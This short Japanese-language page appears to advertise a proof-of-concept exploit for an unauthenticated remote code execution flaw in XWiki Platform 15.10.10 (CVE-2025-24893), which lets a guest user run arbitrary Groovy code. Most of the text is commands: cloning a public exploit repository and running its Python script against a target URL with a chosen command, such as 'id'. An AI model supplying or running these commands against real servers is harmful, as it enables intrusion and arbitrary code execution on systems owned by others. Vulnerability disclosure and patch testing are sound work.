
PoC | XWiki Platform 15.10.10 - リモートコード実行
RCE(Remote Code Execution)カテゴリの脆弱性で、未認証の攻撃者が事前の認証やアクセスなしに(ゲストユーザー)任意のGroovyコードをリモートで実行できるものです。 以下は、この脆弱性を悪用するためのPythonによるPoC(Proof-Of-Concept)です。
git clone https://github.com/zs1n/CVE-2025-24893
python3 CVE-2025-24893.py -u <url> -c <command>
python3 CVE-2025-24893.py -u https://domain.com -c 'id'